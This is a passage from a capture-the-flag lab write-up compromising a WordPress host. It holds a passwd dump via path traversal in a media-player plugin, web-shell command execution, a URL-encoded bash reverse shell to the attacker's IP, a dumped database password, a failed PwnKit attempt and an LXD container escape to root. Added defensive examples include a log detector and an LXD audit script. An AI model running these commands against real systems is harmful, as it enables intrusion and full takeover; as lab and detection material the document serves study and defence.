man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false

4.2.2. Use the vulnerability to reach "/home/jarves/upload/shell.php"

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php"
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
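
The requests in 4.2.1 and 4.2.2 leave a distinctive trace in the web server's access log: a traversal sequence in the cfg parameter of the plugin's ajax_controller.php, and in the second case an included .php file plus a parameter the plugin itself does not use. As an added example (not part of the original write-up or of the advisory), this Python detector classifies Apache combined-format log lines accordingly; the log lines, the benign cfg value, the tag names and the function names are constructed for illustration, and the example also covers repeated percent-encoding, which the page does not show.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint and parameters as they appear in the advisory request quoted above.
PLUGIN_SUFFIX = ("/wp-content/plugins/gracemedia-media-player/"
                 "templates/files/ajax_controller.php")
EXPECTED_PARAMS = {"ajaxaction", "cfg"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
# A ".." path segment delimited by / or \ (or the ends of the value).
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

_BASE = "/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"
# Constructed access-log lines modelled on the requests in this write-up.
SAMPLE_LOG = [
    '192.168.110.139 - - [04/Dec/2023:14:01:10 +0000] "GET ' + _BASE +
    '?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1893 "-" "curl/8.4.0"',
    '192.168.110.139 - - [04/Dec/2023:14:03:42 +0000] "GET ' + _BASE +
    '?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
    ' HTTP/1.1" 200 108 "-" "curl/8.4.0"',
    '192.168.110.139 - - [04/Dec/2023:14:05:01 +0000] "GET ' + _BASE +
    '?ajaxAction=getIds&cfg=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 0 "-" "curl/8.4.0"',
    '192.168.110.1 - - [04/Dec/2023:14:06:00 +0000] "GET ' + _BASE +
    '?ajaxAction=getIds&cfg=player1 HTTP/1.1" 200 15 "-" "Mozilla/5.0"',
    '192.168.110.1 - - [04/Dec/2023:14:06:05 +0000] "GET /wp/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e%252f) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    params = [(k.lower(), fully_decode(v))
              for k, v in parse_qsl(url.query, keep_blank_values=True)]
    tags = set()
    for _, value in params:
        if TRAVERSAL_RE.search(value):
            tags.add("traversal")
            if value.lower().endswith(".php"):
                # A script outside the plugin directory is being included.
                tags.add("script-include")
    if not tags:
        return None
    if url.path.lower().endswith(PLUGIN_SUFFIX):
        tags.add("cve-2019-9618-endpoint")
        if {k for k, _ in params} - EXPECTED_PARAMS:
            # Extra parameters are consumed by the included file, not the plugin.
            tags.add("extra-params")
    if m["status"] == "200" and m["size"] not in ("-", "0"):
        tags.add("served")   # the server returned a non-empty body
    return {"ip": m["ip"], "time": m["ts"], "path": url.path, "tags": sorted(tags)}


def scan(lines):
    return [finding for finding in map(classify, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["ip"], ",".join(finding["tags"]))
```

A line tagged both script-include and extra-params is the highest-priority case, since it matches the code-execution request in 4.2.2 rather than a plain file read.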

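4.2.3. AntSword connection failed

I don't know why AntSword so often fails to connect... maybe I'm not using it correctly.

5. Reverse shell

  • The reverse-shell command is URL-encoded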
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# echo $(python3 -c "import urllib.parse; print(urllib.parse.quote('''bash -c 'bash -i >& /dev/tcp/192.168.110.139/10086 0>&1''', safe=''))")
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.110.139%2F10086%200%3E%26
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.110.139%2F10086%200%3E%261"
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# nc -lvnp 10086                                                                                    
listening on [any] 10086 ...
connect to [192.168.110.139] from (UNKNOWN) [192.168.110.138] 43884
bash: cannot set terminal process group (1207): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$ cd ~
www-data@hackerctflab:/var/www$

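6. Information gathering as www-data

  • Information obtained:
    • Database username and password: root : root
    • Try privilege escalation through the SUID binary polkit-agent-helper-1 (CVE-2021-4034)
    • Nothing else particularly useful was found; privilege escalation still requires going back to 3.2.3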
www-data@hackerctflab:/var/www$ grep -ri -E 'DB_PASSWORD' *
grep -ri -E 'DB_PASSWORD' *
html/wp/wp-admin/setup-config.php:              define( 'DB_PASSWORD', $pwd );
html/wp/wp-admin/setup-config.php:                              case 'DB_PASSWORD':
html/wp/wp-config.php:define( 'DB_PASSWORD', 'root' );
html/wp/wp-config-sample.php:define( 'DB_PASSWORD', 'password_here' );
html/wp/wp-includes/load.php:   $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
www-data@hackerctflab:/var/www$ cat html/wp/wp-config.php
cat html/wp/wp-config.php
<?php
......
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'root' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
......
www-data@hackerctflab:/var/www$ find / -perm -u=s -type f 2>/dev/null | grep -v "/snap/"
find / -perm -u=s -type f 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/chsh
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

6.1. Attempt CVE-2021-4034 privilege escalation (failed)

  • Check the gcc version on the target
www-data@hackerctflab:/tmp$ ldd --version
ldd --version
ldd (Ubuntu GLIBC 2.33-0ubuntu5) 2.33
Copyright (C) 2021 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
  • Compile on Kali
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# gcc cve-2021-4034.c -o exp -Ldir /usr/local/soft/hack/libc/lib/x86_64-linux-gnu/libc.so.6
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# ls
cve-2021-4034.c  cve-2021-4034.sh  dry-run  exp  LICENSE  Makefile  pwnkit.c  README.md
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.110.138 - - [04/Dec/2023 23:08:18] "GET /exp HTTP/1.1" 200 -
  • Run on the target
www-data@hackerctflab:/tmp$ wget "http://192.168.110.139/exp"
wget "http://192.168.110.139/exp"
--2023-12-04 15:08:20--  http://192.168.110.139/exp
Connecting to 192.168.110.139:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15960 (16K) [application/octet-stream]
Saving to: 'exp'
     0K .......... .....                                      100%  129M=0s
2023-12-04 15:08:20 (129 MB/s) - 'exp' saved [15960/15960]
www-data@hackerctflab:/tmp$ chmod +x exp
chmod +x exp
www-data@hackerctflab:/tmp$ ./exp
./exp
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
Cannot run program pwnkit.so:.: No such file or directory

7、Information gathering as user jarves

  • id shows membership in group 116(lxd)
jarves@hackerctflab:~$ history
    1  sudo su -
    2  ifconfig
    3  ls
    4  cd upload/
    5  ls
    6  ls -l
    7  cd ..
    8  ls -l
    9  chmod 755 jarves/
   10  history
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
jarves@hackerctflab:~$ sudo -l
[sudo] password for jarves: 
Sorry, try again.
[sudo] password for jarves: 
Sorry, try again.
[sudo] password for jarves: 
sudo: 3 incorrect password attempts
jarves@hackerctflab:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
jarves@hackerctflab:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
jarves@hackerctflab:~$ echo $BASH_VERSION
5.1.4(1)-release

8、LXD privilege escalation

  • Upload the file over SMB
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# git clone https://github.com/saghul/lxd-alpine-builder
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cd lxd-alpine-builder
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put alpine-v3.13-x86_64-20210218_0139.tar.gz 
putting file alpine-v3.13-x86_64-20210218_0139.tar.gz as \alpine-v3.13-x86_64-20210218_0139.tar.gz (25670.9 kb/s) (average 25670.9 kb/s)
smb: \> exit
  • Afterwards, a「.ssh」directory can be uploaded to enable passwordless login
jarves@hackerctflab:~$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  secrets  something  upload
jarves@hackerctflab:~$ lxc image import ./alpine*.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
jarves@hackerctflab:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
jarves@hackerctflab:~$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
jarves@hackerctflab:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
jarves@hackerctflab:~$ lxc start mycontainer
jarves@hackerctflab:~$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #
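
Added example, not part of the original write-up: a defender-side audit for the two conditions the session above depends on, membership in the lxd group and a privileged instance with the host's / attached as a disk. The function names and the sample group file and instance config are constructed for illustration; the config layout is assumed to follow `lxc config show --expanded` output.

```shell
#!/bin/sh
# Added example: audit for the two conditions used in the LXD section above.
# All sample data below is constructed for illustration.

# Print each member of the lxd group from a group(5)-format file (default /etc/group).
lxd_group_members() {
    awk -F: '$1 == "lxd" && $4 != "" { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' \
        "${1:-/etc/group}"
}

# Read `lxc config show --expanded <instance>` YAML on stdin and print findings:
#   privileged            -> security.privileged is "true"
#   host-root-disk:<dev>  -> a disk device whose source is / on the host
audit_instance_config() {
    awk '
        /^[^ ]/ { section = $1 }                       # top-level key: config:, devices:, ...
        section == "config:" && $1 == "security.privileged:" && $2 ~ /true/ { print "privileged" }
        section == "devices:" && /^  [^ ]/ { dev = $1; sub(/:$/, "", dev) }
        section == "devices:" && $1 == "source:" { src[dev] = $2 }
        section == "devices:" && $1 == "type:"   { kind[dev] = $2 }
        END { for (d in src) if (kind[d] == "disk" && src[d] == "/") print "host-root-disk:" d }
    '
}

# Constructed samples mirroring the session above.
SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,jarves
lxd:x:116:jarves'

SAMPLE_CONFIG='architecture: x86_64
config:
  image.os: alpine
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false
profiles:
- default'

group_file=$(mktemp)
printf '%s\n' "$SAMPLE_GROUP" > "$group_file"
echo "lxd group members: $(lxd_group_members "$group_file")"
echo "instance findings: $(printf '%s\n' "$SAMPLE_CONFIG" | audit_instance_config | tr '\n' ' ')"
rm -f "$group_file"
```

On a live host, call `lxd_group_members` with no argument to read /etc/group, and pipe each instance's `lxc config show --expanded <name>` output into `audit_instance_config`. Any non-administrative account in the lxd group should be treated as root-equivalent.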
